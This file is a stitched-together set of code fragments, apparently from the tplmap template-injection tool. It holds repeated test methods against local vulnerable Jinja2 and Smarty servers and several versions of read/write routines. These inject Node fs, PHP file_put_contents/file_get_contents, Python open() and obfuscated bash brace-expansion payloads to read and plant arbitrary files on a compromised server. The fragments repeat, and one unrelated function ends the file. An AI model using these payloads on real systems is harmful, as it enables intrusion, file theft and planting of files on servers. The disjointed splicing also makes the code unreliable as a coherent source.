def test_upload_blind(self):
obj, data = self._get_detection_obj_data(self.url_blind % '',
technique='T')
self.assertEqual(data, self.expected_data_blind)
if not EXTRA_UPLOAD_BLIND:
return
# Send file without --force-overwrite, should fail
remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)
obj.write('AAAA', remote_temp_path)
self.assertFalse(os.path.exists(remote_temp_path))
# Now set --force-overwrite and retry
obj.channel.args['force_overwrite'] = True
# Send long binary
data = open('/bin/ls', 'rb').read()
obj.write(data, remote_temp_path)
# Since it's blind, read md5 from disk
checkdata = open(remote_temp_path, 'rb').read()
self.assertEqual(strings.md5(checkdata), strings.md5(data))
os.unlink(remote_temp_path)
remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)
# Send short ASCII data
data = 'SHORT ASCII DATA'
obj.write(data, remote_temp_path)
checkdata = open(remote_temp_path, 'rb').read()
self.assertEqual(strings.md5(checkdata), strings.md5(data))
os.unlink(remote_temp_path)
def test_upload_blind(self):
obj, data = self._get_detection_obj_data(
self.url_blind % ''
)
self.assertEqual(data, self.expected_data_blind)
# Send file without --force-overwrite, should fail
remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)
obj.write('AAAA', remote_temp_path)
self.assertFalse(os.path.exists(remote_temp_path))
# Now set --force-overwrite and retry
obj.channel.args['force_overwrite'] = True
# Send long binary
data = open('/bin/ls', 'rb').read()
obj.write(data, remote_temp_path)
# Since it's blind, read md5 from disk
checkdata = open(remote_temp_path, 'rb').read()
self.assertEqual(strings.md5(checkdata), strings.md5(data))
os.unlink(remote_temp_path)
remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)
# Send short ASCII data
data = 'SHORT ASCII DATA'
obj.write(data, remote_temp_path)
checkdata = open(remote_temp_path, 'rb').read()
self.assertEqual(strings.md5(checkdata), strings.md5(data))
os.unlink(remote_temp_path)
def test_upload(self):
obj, data = self._get_detection_obj_data(self.url % '')
self.assertEqual(data, self.expected_data)
if not EXTRA_UPLOAD:
return
remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)
# Send long binary
data = open('/bin/ls', 'rb').read()
obj.write(data, remote_temp_path)
self.assertEqual(obj.md5(remote_temp_path), strings.md5(data))
obj.execute('rm %s' % (remote_temp_path))
remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)
# Send short ASCII data, without removing it
data = 'SHORT ASCII DATA'
obj.write(data, remote_temp_path)
self.assertEqual(obj.md5(remote_temp_path), strings.md5(data))
# Try to append data without --force-overwrite and re-check the previous md5
obj.write('APPENDED DATA', remote_temp_path)
self.assertEqual(obj.md5(remote_temp_path), strings.md5(data))
# Now set --force-overwrite and rewrite new data on the same file
obj.channel.args['force_overwrite'] = True
data = 'NEW DATA'
obj.write(data, remote_temp_path)
self.assertEqual(obj.md5(remote_temp_path), strings.md5(data))
obj.execute('rm %s' % (remote_temp_path))
def test_upload(self):
template = 'AAAA%sAAAA'
channel = Channel({
'url' : 'http://127.0.0.1:15001/reflect/jinja2?inj=*'
})
jinja2obj = Jinja2(channel)
jinja2obj.detect()
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)
# Send long binary
data = open('/bin/ls', 'rb').read()
jinja2obj.write(data, remote_temp_path)
self.assertEqual(jinja2obj._md5(remote_temp_path), strings.md5(data))
jinja2obj.execute('rm %s' % (remote_temp_path))
# Send short ASCII data, without removing it
data = 'SHORT ASCII DATA'
jinja2obj.write(data, remote_temp_path)
self.assertEqual(jinja2obj._md5(remote_temp_path), strings.md5(data))
# Try to append data without --force-overwrite and re-check the previous md5
jinja2obj.write('APPENDED DATA', remote_temp_path)
self.assertEqual(jinja2obj._md5(remote_temp_path), strings.md5(data))
# Now set --force-overwrite and rewrite new data on the same file
jinja2obj.channel.args['force_overwrite'] = True
data = 'NEW DATA'
jinja2obj.write(data, remote_temp_path)
self.assertEqual(jinja2obj._md5(remote_temp_path), strings.md5(data))
jinja2obj.execute('rm %s' % (remote_temp_path))
def test_upload(self):
channel = Channel({
'url' : 'http://127.0.0.1:15002/smarty-3.1.29-unsecured.php?inj=*'
})
smartyobj = Smarty(channel)
smartyobj.detect()
del channel.data['os']
self.assertEqual(channel.data, self.expected_data)
remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)
# Send long binary
data = open('/bin/ls', 'rb').read()
smartyobj.write(data, remote_temp_path)
self.assertEqual(smartyobj._md5(remote_temp_path), strings.md5(data))
smartyobj.execute('rm %s' % (remote_temp_path))
# Send short ASCII data, without removing it
data = 'SHORT ASCII DATA'
smartyobj.write(data, remote_temp_path)
self.assertEqual(smartyobj._md5(remote_temp_path), strings.md5(data))
# Try to append data without --force-overwrite and re-check the previous md5
smartyobj.write('APPENDED DATA', remote_temp_path)
self.assertEqual(smartyobj._md5(remote_temp_path), strings.md5(data))
# Now set --force-overwrite and rewrite new data on the same file
smartyobj.channel.args['force_overwrite'] = True
data = 'NEW DATA'
smartyobj.write(data, remote_temp_path)
self.assertEqual(smartyobj._md5(remote_temp_path), strings.md5(data))
smartyobj.execute('rm %s' % (remote_temp_path))
def test_upload(self):
obj, data = self._get_detection_obj_data(self.url % '')
self.assertEqual(data, self.expected_data)
if not EXTRA_UPLOAD:
return
remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)
# Send long binary
data = open('/bin/ls', 'rb').read()
obj.write(data, remote_temp_path)
self.assertEqual(obj.md5(remote_temp_path), strings.md5(data))
obj.execute('rm %s' % (remote_temp_path))
remote_temp_path = '/tmp/tplmap_%s.tmp' % rand.randstr_n(10)
# Send short ASCII data, without removing it
data = 'SHORT ASCII DATA'
obj.write(data, remote_temp_path)
self.assertEqual(obj.md5(remote_temp_path), strings.md5(data))
# Try to append data without --force-overwrite and re-check the previous md5
obj.write('APPENDED DATA', remote_temp_path)
self.assertEqual(obj.md5(remote_temp_path), strings.md5(data))
# Now set --force-overwrite and rewrite new data on the same file
obj.channel.args['force_overwrite'] = True
data = 'NEW DATA'
obj.write(data, remote_temp_path)
self.assertEqual(obj.md5(remote_temp_path), strings.md5(data))
obj.execute('rm %s' % (remote_temp_path))
def read(self, remote_path):
action = self.actions.get('read', {})
payload = action.get('read')
call_name = action.get('call', 'render')
# Skip if something is missing or call function is not set
if not action or not payload or not call_name or not hasattr(self, call_name):
return
# Get remote file md5
md5_remote = self.md5(remote_path)
if not md5_remote:
log.warn('Error getting remote file md5, check presence and permission')
return
execution_code = payload % ({ 'path' : remote_path })
data_b64encoded = getattr(self, call_name)(
code = execution_code,
)
data = base64.b64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data
def read(self, remote_path):
action = self.actions.get('read', {})
payload = action.get('read')
call_name = action.get('call', 'render')
# Skip if something is missing or call function is not set
if not action or not payload or not call_name or not hasattr(
self, call_name):
return
# Get remote file md5
md5_remote = self.md5(remote_path)
if not md5_remote:
log.warn(
'Error getting remote file md5, check presence and permission')
return
execution_code = payload % ({'path': remote_path})
data_b64encoded = getattr(self, call_name)(code=execution_code, )
data = base64.b64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data
def write(self, data, remote_path):
# Check existance and overwrite with --force-overwrite
if self._md5(remote_path):
if not self.channel.args.get('force_overwrite'):
log.warn(
'Remote path already exists, use --force-overwrite for overwrite'
)
return
else:
self.inject(
"""- global.process.mainModule.require('fs').writeFileSync('%s', '')"""
% remote_path)
# Upload file in chunks of 500 characters
for chunk in chunkit(data, 500):
chunk_b64 = base64.urlsafe_b64encode(chunk)
self.inject(
"""- global.process.mainModule.require('fs').appendFileSync('%s', Buffer('%s', 'base64'), 'binary')"""
% (remote_path, chunk_b64))
if not md5(data) == self._md5(remote_path):
log.warn('Remote file md5 mismatch, check manually')
else:
log.warn('File uploaded correctly')
def write(self, data, remote_path):
# Check existance and overwrite with --force-overwrite
if self._md5(remote_path):
if not self.channel.args.get('force_overwrite'):
log.warn(
'Remote path already exists, use --force-overwrite for overwrite'
)
return
else:
self.evaluate("""file_put_contents("%s", "");""" %
(remote_path))
# Upload file in chunks of 500 characters
for chunk in chunkit(data, 500):
chunk_b64 = base64.urlsafe_b64encode(chunk)
self.evaluate(
"""$d="%s"; file_put_contents("%s", base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)),FILE_APPEND);"""
% (chunk_b64, remote_path))
if not md5(data) == self._md5(remote_path):
log.warn('Remote file md5 mismatch, check manually')
else:
log.warn('File uploaded correctly')
def write(self, data, remote_path):
action = self.actions.get('write', {})
payload_write = action.get('write')
payload_truncate = action.get('truncate')
call_name = action.get('call', 'inject')
# Skip if something is missing or call function is not set
if not action or not payload_write or not payload_truncate or not call_name or not hasattr(
self, call_name):
return
# Check existance and overwrite with --force-overwrite
if self.get('blind') or self.md5(remote_path):
if not self.channel.args.get('force_overwrite'):
if self.get('blind'):
log.warn(
'Blind upload might overwrite files, run with --force-overwrite to continue'
)
else:
log.warn(
'Remote file already exists, run with --force-overwrite to overwrite'
)
return
else:
execution_code = payload_truncate % ({'path': remote_path})
getattr(self, call_name)(code=execution_code)
# Upload file in chunks of 500 characters
for chunk in chunkit(data, 500):
log.debug('[b64 encoding] %s' % chunk)
chunk_b64 = base64.urlsafe_b64encode(chunk)
execution_code = payload_write % ({
'path': remote_path,
'chunk_b64': chunk_b64
})
getattr(self, call_name)(code=execution_code)
if self.get('blind'):
log.warn(
'Blind upload can\'t check the upload correctness, check manually'
)
elif not md5(data) == self.md5(remote_path):
log.warn('Remote file md5 mismatch, check manually')
else:
log.warn('File uploaded correctly')
def read(self, remote_path):
# Get remote file md5
md5_remote = self._md5(remote_path)
if not md5_remote:
log.warn('Error getting remote file md5, check presence and permission')
return
data_b64encoded = self.evaluate("""print(base64_encode(file_get_contents("%s")));""" % remote_path)
data = base64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data
def read(self, remote_path):
# Get remote file md5
md5_remote = self._md5(remote_path)
if not md5_remote:
log.warn('Error getting remote file md5, check presence and permission')
return
data_b64encoded = self.evaluate("""__import__("base64").b64encode(open("%s", "rb").read())""" % remote_path)
data = base64.b64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data
def read(self, remote_path):
# Get remote file md5
md5_remote = self._md5(remote_path)
if not md5_remote:
log.warn('Error getting remote file md5, check presence and permission')
return
data_b64encoded = self.evaluate("""__import__("base64").b64encode(open("%s", "rb").read())""" % remote_path)
data = base64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data
def write(self, data, remote_path):
action = self.actions.get('write', {})
payload_write = action.get('write')
payload_truncate = action.get('truncate')
call_name = action.get('call', 'inject')
# Skip if something is missing or call function is not set
if not action or not payload_write or not payload_truncate or not call_name or not hasattr(self, call_name):
return
# Check existance and overwrite with --force-overwrite
if self.get('blind') or self.md5(remote_path):
if not self.channel.args.get('force_overwrite'):
if self.get('blind'):
log.warn('Blind upload might overwrite files, run with --force-overwrite to continue')
else:
log.warn('Remote file already exists, run with --force-overwrite to overwrite')
return
else:
execution_code = payload_truncate % ({ 'path' : remote_path })
getattr(self, call_name)(
code = execution_code
)
# Upload file in chunks of 500 characters
for chunk in chunkit(data, 500):
log.debug('[b64 encoding] %s' % chunk)
chunk_b64 = base64.urlsafe_b64encode(chunk)
execution_code = payload_write % ({ 'path' : remote_path, 'chunk_b64' : chunk_b64 })
getattr(self, call_name)(
code = execution_code
)
if self.get('blind'):
log.warn('Blind upload can\'t check the upload correctness, check manually')
elif not md5(data) == self.md5(remote_path):
log.warn('Remote file md5 mismatch, check manually')
else:
log.warn('File uploaded correctly')
def write(self, data, remote_path):
# Check existance and overwrite with --force-overwrite
if self._md5(remote_path):
if not self.channel.args.get('force_overwrite'):
log.warn('Remote path already exists, use --force-overwrite for overwrite')
return
else:
self.evaluate("""open("%s", 'w').close()""" % remote_path)
# Upload file in chunks of 500 characters
for chunk in chunkit(data, 500):
chunk_b64 = base64encode(chunk)
self.evaluate("""open("%s", 'ab+').write(__import__("base64").b64decode('%s'))""" % (remote_path, chunk_b64))
if not md5(data) == self._md5(remote_path):
log.warn('Remote file md5 mismatch, check manually')
else:
log.warn('File uploaded correctly')
def write(self, data, remote_path):
# Check existance and overwrite with --force-overwrite
if self._md5(remote_path):
if not self.channel.args.get('force_overwrite'):
log.warn('Remote path already exists, use --force-overwrite for overwrite')
return
else:
self.evaluate("""file_put_contents("%s", "");""" % (remote_path))
# Upload file in chunks of 500 characters
for chunk in chunkit(data, 500):
chunk_b64 = base64encode(chunk)
self.evaluate("""file_put_contents("%s", base64_decode("%s"), FILE_APPEND);""" % (remote_path, chunk_b64))
if not md5(data) == self._md5(remote_path):
log.warn('Remote file md5 mismatch, check manually')
else:
log.warn('File uploaded correctly')
def read(self, remote_path):
# Get remote file md5
md5_remote = self._md5(remote_path)
if not md5_remote:
log.warn('Error getting remote file md5, check presence and permission')
return
# Using base64 since self.execute() calling self.inject() strips
# the response, corrupting the data
data_b64encoded = self.execute('bash -c base64<%s' % remote_path)
data = base64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data
def write(self, data, remote_path):
# Check existance and overwrite with --force-overwrite
if self._md5(remote_path):
if not self.channel.args.get('force_overwrite'):
log.warn('Remote path already exists, use --force-overwrite for overwrite')
return
else:
self.execute("bash -c {echo,-n,}>%s" % (remote_path))
# Upload file in chunks of 500 characters
for chunk in chunkit(data, 500):
chunk_b64 = base64encode(chunk)
self.execute("bash -c {base64,--decode}<<<%s>>%s" % (chunk_b64, remote_path))
if not md5(data) == self._md5(remote_path):
log.warn('Remote file md5 mismatch, check manually')
else:
log.warn('File uploaded correctly')
def write(self, data, remote_path):
# Check existance and overwrite with --force-overwrite
if self._md5(remote_path):
if not self.channel.args.get('force_overwrite'):
log.warn('Remote path already exists, use --force-overwrite for overwrite')
return
else:
self.inject("""- global.process.mainModule.require('fs').writeFileSync('%s', '')""" % remote_path)
# Upload file in chunks of 500 characters
for chunk in chunkit(data, 500):
chunk_b64 = base64encode(chunk)
self.inject("""- global.process.mainModule.require('fs').appendFileSync('%s', Buffer.from('%s', 'base64'), 'binary')""" % (remote_path, chunk_b64))
if not md5(data) == self._md5(remote_path):
log.warn('Remote file md5 mismatch, check manually')
else:
log.warn('File uploaded correctly')
def write(self, data, remote_path):
# Check existance and overwrite with --force-overwrite
if self._md5(remote_path):
if not self.channel.args.get('force_overwrite'):
log.warn('Remote path already exists, use --force-overwrite for overwrite')
return
else:
self.evaluate("""open("%s", 'w').close()""" % remote_path)
# Upload file in chunks of 500 characters
for chunk in chunkit(data, 500):
chunk_b64 = base64.urlsafe_b64encode(chunk)
self.evaluate("""open("%s", 'ab+').write(__import__("base64").urlsafe_b64decode('%s'))""" % (remote_path, chunk_b64))
if not md5(data) == self._md5(remote_path):
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File uploaded correctly')
def read(self, remote_path):
# Get remote file md5
md5_remote = self._md5(remote_path)
if not md5_remote:
log.warn(
'Error getting remote file md5, check presence and permission')
return
data_b64encoded = self.evaluate(
"""print(base64_encode(file_get_contents("%s")));""" % remote_path)
data = base64.b64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data
def read(self, remote_path):
# Get remote file md5
md5_remote = self._md5(remote_path)
if not md5_remote:
log.warn('Error getting remote file md5, check presence and permission')
return
# Use base64 since self.execute() calling self.inject() strips
# the response, corrupting the data
data_b64encoded = self.inject("""= global.process.mainModule.require('fs').readFileSync('%s').toString('base64')""" % remote_path)
data = base64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data
def read(self, remote_path):
# Get remote file md5
md5_remote = self._md5(remote_path)
if not md5_remote:
log.warn(
'Error getting remote file md5, check presence and permission')
return
# Using base64 since self.execute() calling self.inject() strips
# the response, corrupting the data
data_b64encoded = self.execute('bash -c base64<%s' % remote_path)
data = base64.b64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data
def write(self, data, remote_path):
# Check existance and overwrite with --force-overwrite
if self._md5(remote_path):
if not self.channel.args.get('force_overwrite'):
log.warn(
'Remote path already exists, use --force-overwrite for overwrite'
)
return
else:
self.execute("bash -c {echo,-n,}>%s" % (remote_path))
# Upload file in chunks of 500 characters
for chunk in chunkit(data, 500):
chunk_b64 = base64.urlsafe_b64encode(chunk)
self.execute("bash -c {base64,--decode}<<<{tr,/+,_-}<<<%s>>%s" %
(chunk_b64, remote_path))
if not md5(data) == self._md5(remote_path):
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File uploaded correctly')
def read(self, remote_path):
# Get remote file md5
md5_remote = self._md5(remote_path)
if not md5_remote:
log.warn(
'Error getting remote file md5, check presence and permission')
return
# Use base64 since self.execute() calling self.inject() strips
# the response, corrupting the data
data_b64encoded = self.inject(
"""= global.process.mainModule.require('fs').readFileSync('%s').toString('base64')"""
% remote_path)
data = base64.b64decode(data_b64encoded)
if not md5(data) == md5_remote:
log.warn('Remote file md5 mismatch, check manually')
else:
log.info('File downloaded correctly')
return data
def gen_verify_code_key(self, email):
return 'email_key_' + strings.md5(email)